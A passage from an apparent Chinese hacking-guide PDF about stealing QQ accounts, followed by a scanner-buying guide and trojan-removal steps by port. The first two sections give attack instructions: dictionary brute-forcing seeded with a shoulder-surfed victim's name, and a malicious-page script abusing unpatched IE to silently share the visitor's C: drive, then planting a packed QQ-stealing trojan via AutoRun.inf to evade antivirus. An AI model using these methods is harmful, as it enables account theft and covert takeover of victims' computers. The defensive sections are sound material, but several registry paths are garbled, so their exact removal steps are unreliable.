了吧,被盗了吧,正常。想上网吧,想用 Q 吧,不想被盗 Q 吧,正常。那 就来了解一些盗 QQ 方面的知识吧! 一、名词解释 1.字典 所谓字典,其实就是一个包含有许多密码的文本文件。字典的生成有两种方式:用字典软件 生成和手动添加。一般字典软件能生成包含生日、电话号码、常用英文名等密码的字典,不 过由于这样生成的字典体积大,而且不灵活,所以黑客往往会手动添加一些密码到字典里去, 形成一个“智能化”的密码文件。 2.暴力破解 所谓暴力破解,其实就是用无数的密码来与登录 QQ 的密码进行核对,直到相同为止。暴力 破解这种方法不仅可以运用在盗 QQ 上,在破解其它密码时也常用这种方法,如:破解系统 管理员密码等。这是最常用的一种破解方式。 二、原理分析 现在盗 QQ 的软件有两种,本地破解和远程破解。看起来好像挺神秘的,其实说穿了就那么 回事。下面咱们先来看看本地破解。 1.本地破解 本地破解其实就是用软件选择一个在本地登录过的 QQ 号码,然后挂上字典进行密码核对。 本地破解也可分为两种:暴力破解和本地记录。而暴力破解又分为两种:按顺序增加和通过 字典对比。比如现在我要破解 QQ 号为 123456 的密码,我可以用 1 作为密码进行核对,如 果正确就可以盗走该号了,如果不正确,则用 2 来核对,还不正确,则用 3,以此顺序增加, 直到和密码相同为止。不过这样的破解效率是很低的,因为许多人的密码并不只是数字,所 以这种方法并不常见。 平时常用的是通过对比字典中密码的方法,如果正确就盗走 QQ。因为字典可以做得很“智 能化”,所以这种破解效率相对较高,特别是当你的密码是简单的数字,或是数字加一些英 文名时特别明显。举个例子,比如我在网吧看到一 MM 的英文名为 alice,密码位数为 8 位 (我怎么知道的?晕!偷看到的嘛!)。从常理来讲,一般她的密码就是 alice 加上一些数字。 于是我可以用易优超级字典生成器制作这样一个字典:把 alice 做为特殊字符排在密码的第 1-5 位(如图 1),然后把基本字符里的数字全部选上,再将密码位数设为 8,然后选好保存 位置点“生成字典”。 131 图 1 打开生成的字典,你就可以看到 alice000、alice001 等密码了(如图 2)。然后就是把 alice 放在第 2-6 位,第 3-7 位,第 4-8 位,其它位置同样用数字填满。接下来我只要用软件把这 些字典挂上进行破解,很快就可以得到 QQ 密码了。 =============================================== 黑客通过网页窃取 QQ 方法 要想偷别人的 QQ,方法有很多了。利用恶意网页使对方的电脑被共享出来是很有趣的一招。 方法是:在你的网站网页中加入如下内容的代码: ------------------------------------------------------------------------ <script language=Java Script> document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent ></APPLET>"); function f() {*********************]; al.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); al.createlnstance() Shl=al.GetObject() Shl.RegWrite("HKLM//Software//Microsoft//Windows//CurrentVersion//Network//LanMan//RW C$//Flafgs",302,"REG_DWORD"); Shl.RegWrite("HKLM//Software//Microsoft//Windows//CurrentVersion//Network//LanMan//RW C$//Type",0,"REG_DWORD"); Shl.RegWrite("HKLM//Software//Microsoft//Windows//CurrentVersion//Network//LanMan//RW C$//Path","C://");} function init() {setTimeout("f()",1000);} {********************} init() </script> ------------------------------------- 上面的代码大家一定很容易读懂,简单说来就是通过修改对方注册表中的键值,把对方的 C 132 盘共享出来,如果想让对方的其他盘都共享请自行设置。 述代码中{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}代表 Windows Scripting Host(WSH) 的外壳对象。WSH 是微软提供的一种基于 32 位 Windows 平台的、与语言无关的脚本解释 机制,它使得脚本能够直接在 Windows 桌面或命令提示符下运行。WSH 使得脚本可以被执 行,就象执行批处理一样。以“Shl.RegWrite”开头的这几句代码的作用是写入浏览者的注 册表,就是它们使得对方的硬盘被共享的。把“Flags”的键值设为 00000302 可以隐藏共享, 使对方无法发现,非常隐蔽。 网页做好后,把它上传你的主页空间,骗他浏览你的网页(就看你的嘴皮子功夫了),如果 对方的 IE 没有打补丁(网上这样的电脑有很多),就可以把他的 C 盘共享出来。整个方法 的原理就是把 com.ms.activeX.ActiveXComponent 对象嵌入<APPLET>标记中,这样会导致 任意创建和解释执行 ActiveX 对象,使我们可以创建任意文件、运行程序、写注册表。未打 补丁的 IE,在打开含有上述代码的网页时不会有任何警告,我们就是利用这个漏洞把对方 的硬盘被共享出来。 等对方中招后,就把对方的硬盘映射过来,可以使用 net use 命令,也可以使用网络刺客 II 等软件。下一步可以给对方植入一个盗 QQ 的软件,比方说 QQ 杀手等,注意一定要用 ASPack 或其他加壳软件给木马加壳(其实就是另类“压缩”),防止杀毒软件发现。 最后,打开记事本键入以下内容: [AutoRun] open=winnt32.exe 保存为 AutoRun.inf,其中的 winnt32.exe 为木马文件。把 AutoRun.inf 和 winnt32.exe 一起拷 到对方某分区的根目录下。这样,只要他双击该分区就会中木马!这样可以大大的增加木马 运行的主动性!须知许多人现在都非常警惕,不熟悉的文件他们轻易的不会运行,而这种方 法就很难防范了。 以后,你就等着用邮箱收信收对方的 QQ 密码吧。 注意,本文只是技术交流,大家不要随意盗取别人的 QQ。同时为了保障安全我们没有完全 刊登源代码。敬请原谅! =================================== 选择漏洞扫描工具 对于一个复杂的多层结构的系统和网络安全规划来说,隐患扫描是一项重要的组成元素。隐 患扫描能够模拟黑客的行为,对系统设置进行攻击测试,以帮助管理员在黑客攻击之前,找 出网络中存在的 漏洞。这样的工具可以远程评估你的网络的安全级别,并生成评估报告, 提供相应的整改措施。 133 目前,市场上有很多隐患扫描工具,按照不同的技术(基于网络的、基于主机的、基于代理 的、C/S 的)、不同的特征、不同的报告方法,以及不同的监听模式,可以分成好几类。不 同的产品之间,漏洞检测的准确性差别较大,这就决定了生成的报告的有效性上也有很大区 别。 选择正确的隐患扫描工具,对于提高你的系统的安全性,非常重要。 1、漏洞扫描概述 在字典中,Vulnerability 意思是漏洞或者缺乏足够的防护。在军事术语中,这个词的意思更 为明确,也更为严重------有受攻击的嫌疑。 每个系统都有漏洞,不论你在系统安全性上投入多少财力,攻击者仍然可以发现一些可利用 的特征和配置缺陷。这对于安全管理员来说,实在是个不利的消息。但是,多数的攻击者, 通常做的是简单的事情。发现一个已知的漏洞,远比发现一个未知漏洞要容易的多,这就意 味着:多数攻击者所利用的都是常见的漏洞,这些漏洞,均有书面资料记载。 ⑤ 生成的报告的特性(内容是否全面、是否可配置、是否可定制、报告的格式、输出方式 等 ); ⑥ 对于漏洞修复行为的分析和建议(是否只报告存在哪些问题、是否会告诉您应该如何修 补这些漏洞); ⑦ 安全性(由于有些扫描工具不仅仅只是发现漏洞,而且还进一步自动利用这些漏洞,扫 描工具自身是否会带来安全风险); ⑧ 性能; ⑨ 价格结构 这样的话,采用适当的工具,就能在黑客利用这些常见漏洞之前,查出网络的薄弱之处。如 何快速简便地发现这些漏洞,这个非常重要。 漏洞,大体上分为两大类: ① 软件编写错误造成的漏洞; ② 软件配置不当造成的漏洞。 漏洞扫描工具均能检测以上两种类型的漏洞。漏洞扫描工具已经出现好多年了,安全管理员 在使用这些工具的同时,黑客们也在利用这些工具来发现各种类型的系统和网络的漏洞。 入侵是重要的第一步。当您迈出了这一步后,接下来的是:如何选择满足您公司需要的合适 的隐患扫描技术,这同样也很重要。以下列出了一系列衡量因素: ① 底层技术(比如,是被动扫描还是主动扫描,是基于主机扫描还是基于网络扫描); 134 ② 特性; ③ 漏洞库中的漏洞数量; ④ 易用性; 2.1 底层技术 比较漏洞扫描工具,第一是比较其底层技术。你需要的是主动扫描,还是被动扫描;是基于 主机的扫描,还是基于网络的扫描,等等。一些扫描工具是基于 Internet 的,用来管理和集 合的服务器程序,是运行在软件供应商的服务器上,而不是在客户自己的机器上。这种方式 的优点在于检测方式能够保证经常更新,缺点在于需要依赖软件供应商的服务器来完成扫描 工作。 扫描古城可以分为"被动"和"主动"两大类。被动扫描不会产生网络流量包,不会导致目标系 统崩溃,被动扫描工具对正常的网络流量进行分析,可以设计成"永远在线"检测的方式。与 主动扫描工具相比,被动扫描工具的工作方式,与网络监控器或 IDS 类似。 主动扫描工具更多地带有"入侵"的意图,可能会影响网络和目标系统的正常操作。他们并不 是持续不断运行的,通常是隔一段时间检测一次。 基于主机的扫描工具需要在每台主机上安装代理(Agent)软件;而基于网络的扫描工具则 不需要。基于网络的扫描工具因为要占用较多资源,一般需要一台专门的计算机。 如果网络环境中含有多种操作系统,您还需要看看扫描其是否兼容这些不同的操作系统(比 如 Microsoft、Unix 以及 Netware 等 )。 2.2 管理员所关心的一些特性 通常,漏洞扫描工具完成一下功能:扫描、生成报告、分析并提出建议,以及数据管理。在 许多方面,扫描是最常见的功能,但是信息管理和扫描结果分析的准确性同样很重要。另外 要考虑的一个方面是通知方式:当发现漏洞后,扫描工具是否会向管理员报警?采用什么方 式报警? 对于漏洞扫描软件来说,管理员通常关系以下几个方面: ① 报表性能好; ② 易安装,易使用; ③ 能够检测出缺少哪些补丁; ④ 扫描性能好,具备快速修复漏洞的能力; ⑤ 对漏洞及漏洞等级检测的可*性; ⑥ 可扩展性; ⑦ 易升级性; ⑧ 性价比好; 2.3 漏洞库 135 只有漏洞库中存在相关信息,扫描工具才能检测到漏洞,因此,漏洞库的数量决定了扫描工 具能够检测的范围。 然而,数量并不意味着一切,真正的检验标准在于扫描工具能否检测出最常见的漏洞?最根 本的在于,扫描工具能否检测出影响您的系统的那些漏洞?扫描工具中有用的总量取决于你 的网络设备和系统的类型。你使用扫描工具的目的是利用它来检测您的特定环境中的漏洞。 如果你有很多 Netware 服务器,那么,不含 Netware 漏洞库的扫描工具就不是你的最佳选择。 当然,漏洞库中的攻击特性必须经常升级,这样才能检测到最近发现的安全漏洞。 2.4 易使用性 一个难以理解和使用的界面,会阻碍管理员使用这些工具,因此,界面友好性尤为重要。不 同的扫描工具软件,界面也各式各样,从简单的基于文本的,到复杂的图形界面,以及 Web 界面。 2.5 扫描报告 对管理员来说,扫描报告的功能越来越重要,在一个面向文档的商务环境中,你不但要能够 完成你的工作,而且还需要提供书面资料说明你是怎样完成的。事实上,一个扫描可能会得 到几百甚至几千个结果,但是这些数据是没用的,除非经过整理,转换成可以为人们理解的 信息。这就意味着理想情况下,扫描工具应该能够对这些数据进行分类和交*引用,可以导 到其他程序中,或者转换成其他格式(比如 CSV,HTML,XML,MHT,MDB,EXCEL 以及 Lotus 等等),采用不同方式来展现它,并且能够很容易的与以前的扫描结果做比较。 漏洞,才完成一半工作。一个完整的方案,同时将告诉你针对这些漏洞将采取哪些措施。一 个好的漏洞扫描工具会对扫描结果进行分析,并提供修复建议。一些扫描工具将这些修复建 议整合在报告中,另外一些则提供产品网站或其它在线资源的链接。 漏洞修复工具,它可以和流行的扫描工具结合在一起使用,对扫描结果进行汇总,并自动完 成修复过程。 2.7 分析的准确性 只有当报告的结果是精确的,提供的修复建议是有效的,一份包含了详细漏洞修复建议的报 告, 才算是一份优秀的报告。一个好的扫描工具必须具有很低的误报率(报告出的漏洞实 际上不存在)和漏报率(漏洞存在,但是没有检测到)。 2.8 安全问题 因扫描工具而造成的网络瘫痪所引起的经济损失,和真实攻击造成的损失是一样的,都非常 巨大。一些扫描工具在发现漏洞后,会尝试进一步利用这些漏洞,这样能够确保这些漏洞是 真实存在的,进而消除误报的可能性。但是,这种方式容易出现难以预料的情况。在使用具 136 备这种功能的扫描工具的时候,需要格外小心,最好不要将其设置成自动运行状态。 扫描工具可能造成网络失效的另一种原因,是扫描过程中,超负荷的数据包流量造成拒绝服 务(DOS,Denial Of Service)。为了防止这一点,需要选择好适当的扫描设置。相关的设置 项有:并发的线程数、数据包间隔时间、扫描对象总数等,这些项应该能够调整,以便使网 络的影响降到最低。一些扫描工具还提供了"安全扫描"的模板,以防止造成对目标系统的损 耗。 2.9 性能 扫描工具运行的时候,将占用大量的网络带宽,因此,扫描过程应尽快完成。当然,漏洞库 中的漏洞数越多,选择的扫描模式越复杂,扫描所耗时间就越长,因此,这只是个相对的数 值。提高性能的一种方式,是在企业网中部署多个扫描工具,将扫描结果反馈到一个系统中, 对扫描结果进行汇总。 3、隐患扫描工具的价格策略 商业化的扫描工具通常按以下几种方式来发布器授权许可证:按 IP 地址授权,按服务器授 权,按管理员授权。不同的授权许可证方式有所区别。 3.1 按 IP 段授权 许多扫描其产品,比如 eEye 的 Retina 和 ISS(Internet Security Scanner)要求企业用户按照 IP 段或 IP 范围来收费。换句话说,价格取决于所授权的可扫描的 IP 地址的数目。 3.2 按服务器授权 一些扫描工具供应商,按照每个服务器/每个工作站来计算器许可证的价格。服务器的授权 价格会比工作站高很多,如果有多台服务器的话,扫描工具的价格会明显上升。 3.3 按管理员授权 对于大多数企业而言,这种授权方式,比较简单,性价比也较好。 4、总结 在现在的互联网环境中,威胁无处不在。为了防范攻击,第一件事就是在黑客发动攻击之前, 发现网络和系统中的漏洞,并及时修复。 但是,漏洞扫描工具在特性、精确性、价格以及可用性上差别较大,如何选择一个正确的隐 患扫描工具,尤为重要。 137 ===================================================== 黑客及木马攻击常见端口的关闭 以下列出的端口仅为相关木马程序默认情况下开放的端口,请根据具体情况采取相应的操 作: 707 端口的关闭: 这个端口开放表示你可能感染了 nachi 蠕虫病毒,该蠕虫的清除方法如下: 1、停止服务名为 WinS Client 和 Network Connections Sharing 的两项服务 2、删除 c:WinntSYSTEM32WinS 目录下的 DLLHOST.EXE 和 SVCHOST.EXE 文件 3、编辑注册表,删除 HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices 项中名 为 RpcTftpd 和 RpcPatch 的两个键值 1999 端口的关闭: 这个端口是木马程序 BackDoor 的默认服务端口,该木马清除方法如下: 1、使用进程管理工具将 notpa.exe 进程结束 2、删除 c:Windows 目录下的 notpa.exe 程序 3、编辑注册表,删除HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion Run 项中包含 c:Windows otpa.exe /o=yes 的键值 2001 端口的关闭: 这个端口是木马程序黑洞 2001 的默认服务端口,该木马清除方法如下: 1、首先使用进程管理软件将进程 Windows.exe 杀掉 2、删除 c:Winntsystem32 目录下的 Windows.exe 和 S_Server.exe 文件 3、编辑注册表,删除 HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion RunServices 项中名为 Windows 的键值 4、将 HKEY_CLASSES_ROOT 和 HKEY_LOCAL_MACHINESoftwareCLASSES 项中的 138 Winvxd 项删除 5、修改 HKEY_CLASSES_ROOT xtfileshellopencommand 项中的 c:Winntsystem32S_SERVER.EXE %1 为 C:WinNTNOTEPAD.EXE %1 6、修改 HKEY_LOCAL_MACHINESoftwareCLASSES xtfileshellopencommand 项中的 c:Winntsystem32S_SERVER.EXE %1 键值改为 C:WinNTNOTEPAD.EXE %1 2023 端口的关闭: 这个端口是木马程序 Ripper 的默认服务端口,该木马清除方法如下: 1、使用进程管理工具结束 sysrunt.exe 进程 2、删除 c:Windows 目录下的 sysrunt.exe 程序文件 3、编辑 system.ini 文件,将 shell=explorer.exe sysrunt.exe 改为 shell=explorer.exe 后保存 4、重新启动系统 2583 端口的关闭: 这个端口是木马程序 Wincrash v2 的默认服务端口,该木马清除方法如下: 1、编辑注册表,删除HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion Run 项中的 WinManager = "c:Windowsserver.exe"键值 2、编辑 Win.ini 文件,将 run=c:Windowsserver.exe 改为 run=后保存退出 3、重新启动系统后删除 C:Windowssystem SERVER.EXE 3389 端口的关闭: 首先说明 3389 端口是 Windows 的远程管理终端所开的端口,它并不是一个木马程序,请先 确定该服务是否是你自己开放的。如果不是必须的,请关闭该服务。 Win2000 关闭的方法: 1、Win2000server 开始-->程序-->管理工具-->服务里找到 Terminal Services 服务项,选中属 性选项将启动类型改成手动,并停止该服务。 2、Win2000pro 开始-->设置-->控制面板-->管理工具-->服务里找到 Terminal Services 服务项, 139 选中属性选项将启动类型改成手动,并停止该服务。 Winxp 关闭的方法: 在我的电脑上点右键选属性-->远程,将里面的远程协助和远程桌面两个选项框里的勾去掉。 4444 端口的关闭: 如果发现你的机器开放这个端口,可能表示你感染了 msblast 蠕虫,清除该蠕虫的方法如下: 1、使用进程管理工具结束 msblast.exe 的进程 2、编辑注册表,删除HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun 项中的"Windows auto update"="msblast.exe"键值 3、删除 c:Winntsystem32 目录下的 msblast.exe 文件 4899 端口的关闭: 首先说明 4899 端口是一个远程控制软件(remote administrator)服务端监听的端口,他不能 算是一个木马程序,但是具有远程控制功能,通常杀毒软件是无法查出它来的,请先确定该 服务是否是你自己开放并且是必需的。如果不是请关闭它。 关闭 4899 端口: 1、请在开始-->运行中输入 cmd(98 以下为 command),然后 cd C:Winntsystem32(你的系统安 装目录),输入 r_server.exe /stop 后按回车。 然后在输入 r_server /uninstall /silence 2、到 C:Winntsystem32(系统目录)下删除 r_server.exe admdll.dll raddrv.dll 三个文件 5800,5900 端口: 首先说明 5800,5900 端口是远程控制软件 VNC 的默认服务端口,但是 VNC 在修改过后会 被用在某些蠕虫中。 请先确认 VNC 是否是你自己开放并且是必须的,如果不是请关闭 关闭的方法: 140 1、首先使用 fport 命令确定出监听在 5800 和 5900 端口的程序所在位置(通常会是 c:Winntfont***plorer.exe) 2、在任务管理器中杀掉相关的进程(注意有一个是系统本身正常的,请注意!如果错杀可 以重新运行 c:Winntexplorer.exe) 3、删除 C:Winntfonts 中的 explorer.exe 程序。 4、删除注册表 HKEY_LOCAL_MACHINESoftwareMicrosoftWindows CurrentVersionRun 项中的 Explorer 键值。 5、重新启动机器。 6129 端口的关闭: 首先说明 6129 端口是一个远程控制软件(dameware nt utilities)服务端监听得端口,他不是 一个木马程序,但是具有远程控制功能,通常的杀毒软件是无法查出它来的。请先确定该服 务是否是你自己安装并且是必需的,如果不是请关闭 关闭 6129 端口: 1、选择开始-->设置-->控制面板-->管理工具-->服务 找到 DameWare Mini Remote Control 项点击右键选择属性选项,将启动类型改成禁用后停止 该服务。 2、到 c:Winntsystem32(系统目录)下将 DWRCS.EXE 程序删除。 3、到注册表内将 HKEY_LOCAL_MACHINESYSTEMControlSet001Services 项中的 DWRCS 键值删除 6267 端口的关闭: 6267 端口是木马程序广外女生的默认服务端口,该木马删除方法如下: 1、启动到安全模式下,删除 c:Winntsystem32 下的 DIAGFG.EXE 文件 2、到 c:Winnt 目录下找到 regedit.exe 文件,将该文件的后缀名改为.com 3、选择开始-->运行输入 regedit.com 进入注册表编辑页面 4、修改 HKEY_CLASSES_ROOTexefileshellopencommand 项的键值为 "%1" %* 141 5、删 除 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows CurrentVersionRunServices 项中名字为 Diagnostic Configuration 的键值 6、将 c:Winnt 下的 regedit.com 改回到 regedit.exe 6670、6771 端口的关闭: 这些端口是木马程序 DeepThroat v1.0 - 3.1 默认的服务端口,清除该木马的方法如下: 1 、编辑注册表,删除 HKEY_LOCAL_MACHINESOFTWAREMicroSoftWindowsCurrentVersion Run 项中的‘System32‘=c:Windowssystem32.exe 键值(版本 1.0)或‘SystemTray‘ = ‘Systray.exe‘ 键值(版本 2.0-3.0)键值 3、重新启动机器后删除 c:Windowssystem32.exe(版本 1.0)或 c:Windowssystemsystray.exe (版本 2.0-3.0) 6939 端口的关闭: 这个端口是木马程序 Indoctrination 默认的服务端口,清除该木马的方法如下: 1、编辑注册表,删除 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows CurrentVersionRun HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows CurrentVersionRunServices HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows CurrentVersionRunOnce HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows CurrentVersionRunServicesOnce 四项中所有包含 Msgsrv16 ="msgserv16.exe"的键值 2、重新启动机器后删除 C:Windowssystem 目录下的 msgserv16.exe 文件 6969 端口的关闭: 这个端口是木马程序 PRIORITY 的默认服务端口,清除该木马的方法如下: 1、编 辑 注册表,删除HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion Run Services 项中的"PServer"= C:WindowsSystemPServer.exe 键值 2、重新启动系统后删除 C:WindowsSystem 目录下的 PServer.exe 文件 142 7306 端口的关闭: 这个端口是木马程序网络精灵的默认服务端口,该木马删除方法如下: 1、你可以使用 fport 察看 7306 端口由哪个程序监听,记下程序名称和所在的路径 2、如果程序名为 Netspy.exe,你可以在命令行方式下到该程序所在目录输入命令 Netspy.exe /remove 来删除木马 3、如果是其他名字的程序,请先在进程中结束该程序的进程,然后到相应目录下删除该程 序。 4 、编辑注册表,将 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows CurrentVersionRun 项和 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows CurrentVersionRunServices 项中与该程序有关的键值删除 7511 端口的关闭: 7511 是木马程序聪明基因的默认连接端口,该木马删除方法如下: 1、首先使用进程管理工具杀掉 MBBManager.exe 这个进程 2、删除 c:Winnt(系统安装目录)中的 MBBManager.exe 和 Explore32.exe 程序文件,删除 c:Winntsystem32 目录下的 editor.exe 文件 3 、编辑注册表,删除注册表 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion Run 项中内容为 C:WinNTMBBManager.exe 键名为 MainBroad BackManager 的项。 4 、修改注册表 HKEY_CLASSES_ROOT xtfileshellopencommand 中的 c:Winntsystem32editor.exe %1 改为 c:WinntNOTEPAD.EXE %1 5、修改注册表 HKEY_LOCAL_MACHINESoftwareCLASSEShlpfileshellopencommand 项中的 C:WinNTexplore32.exe %1 键值改为 C:WinNTWinHLP32.EXE %1 7626 端口的关闭: 7626 是木马冰河的默认开放端口(这个端口可以改变),木马删除方法如下: 1 、启动机器到安全模式下,编辑注册表,删除 HKEY_LOCAL_MACHINEsoftwaremicrosoftWindows CurrentVersionRun 143 项中内容为 c:Winntsystem32Kernel32.exe 的键值 2、删除 HKEY_LOCAL_MACHINEsoftwaremicrosoftWindows CurrentVersionRunservices 项 中内容为 C:Windowssystem32Kernel32.exe 的键值 3 、修改 HKEY_CLASSES_ROOT xtfileshellopencommand 项下的 C:Winntsystem32Sy***plr.exe %1 为 C:Winnt otepad.exe %1 4、到 C:Windowssystem32 下删除文件 Kernel32.exe 和 Sy***plr.exe 8011 端口的关闭: 8011 端口是木马程序 WAY2.4 的默认服务端口,该木马删除方法如下: 1、首先使用进程管理工具杀掉 msgsvc.exe 的进程 2、到 C:Windowssystem 目录下删除 msgsvc.exe 文件 3、编辑注册表,删除HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion Run 项中内容为 C:WinDOWSSYSTEMmsgsvc.exe 的键值 【 全部完 】
还剩142页未读

继续阅读

下载pdf到电脑,查找使用更方便

pdf的实际排版效果,会与网站的显示效果略有不同!!

需要 7 金币 [ 分享pdf获得金币 ] 0 人已下载

下载pdf

pdf贡献者

xzxi

贡献于2013-02-15

下载需要 7 金币 [金币充值 ]
亲,您也可以通过 分享原创pdf 来获得金币奖励!
下载pdf